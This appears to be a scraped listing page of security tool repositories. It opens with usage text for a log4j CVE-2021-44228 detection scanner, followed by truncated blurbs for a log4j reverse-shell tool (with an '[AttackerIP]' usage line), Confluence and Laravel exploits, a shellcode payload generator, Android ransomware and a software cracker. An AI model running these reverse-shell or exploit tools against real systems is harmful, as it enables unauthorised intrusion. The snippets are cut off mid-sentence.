CVE-2021-44228 log4j 2.x rce漏洞检测工具,对目标链接发起get请求并利用dnslog探测是否有回显
$ python3 log4j-scan.py -h
Usage: python log4j-scan.py -u <target url>
Options:
-h, --help show this help message and exit
-u URL, --url=URL 输入需要检查的链接,如: https://ainrm.cn
-u形式传入链接
MassDNS A high-performance DNS stub resolver MassDNS is a simple high-performance DNS stub resolver targeting those who seek to resolve a massive amou
Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At
edgedressing One day while experimenting with airpwn-ng, I noticed unexpected GET requests on the target node. The node in question happened to be a W
PoisonApple Command-line tool to perform various persistence mechanism techniques on macOS. This tool was designed to be used by threat hunters for cy
laravel-exploits Exploit for CVE-2021-3129
ShoLister is a tool that collects all available subdomains for specific hostname or organization from Shodan. The tool is designed to be used from Penetration Tester and Bug Bounty Hunters.
Encrypted messaging application with the use of MIFARE DESfire chip to store the private/public keys needed for the application authentication
PocOrExp in Github 聚合Github上已有的Poc或者Exp,CVE信息来自CVE官网 注意:只通过通用的CVE号聚合,因此对于MS17-010等Windows编号漏洞以及著名的有绰号的漏洞,还是自己检索一下比较好 Usage python3 exp.py -h usage: ex
NS-LOOKUP A python script for scanning website for getting ip address of a websi
IDA Pattern Search by Argus Cyber Security Ltd. The IDA Pattern Search plugin adds a capability of finding functions according to bit-patterns into th
StarUML_cracker Usage On Linux Clone the repo. git clone https://github.com/mana
HatVenom HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures. Featu
The Python SE Dopp Kit is a social engineering toolkit with many purposes. It contains 5 different modules designed to be of assistance in different s
CVE-2021-26084 CVE-2021-26084 Remote Code Execution on Confluence Servers. Dork Fofa: app="ATLASSIAN-Confluence" Usage Show help information. python P
FeatureHasher Convert a collection of features to a fixed-dimensional matrix using the hashing trick. Note, this requires Jina=2.2.4. Example Here I
infotr A traceroute tool that also displays IP information. This tool has only been tested on Linux. Quick Start First, install this tool from PyPI. p
Dumpulator-IDA Currently proof-of-concept This project is a small POC plugin for launching dumpulator emulation within IDA, passing it addresses from
check_mkExtension to check for log4j2 CVE-2021-44228 This Plugin wraps around logpresso/CVE-2021-44228-Scanner (Apache License 2.0) How it works Run i
SARA - Simple Android Ransomware Attack Disclaimer The author is not responsible for any issues or damage caused by this program. Features User can cu
TTUN Server The self-hostable proxy tunnel. Running Running: docker run -e TUNNEL_DOMAIN=Your tunnel domain -e SECURE=True if using SSL ghcr.io/to
2.5k Jan 07, 2023
16 Mar 24, 2022
43 Dec 23, 2022
212 Dec 29, 2022
228 Nov 25, 2022
45 Dec 28, 2022
4 Nov 06, 2021
567 Dec 30, 2022
5 Aug 02, 2022
48 Dec 29, 2022
9 Jun 20, 2022
100 Dec 23, 2022
48 Nov 26, 2022
63 Dec 30, 2022
5 Mar 15, 2022
10 Oct 29, 2022
9 Sep 21, 2022
4 Jun 30, 2022
99 Jan 04, 2023
2 Jan 11, 2022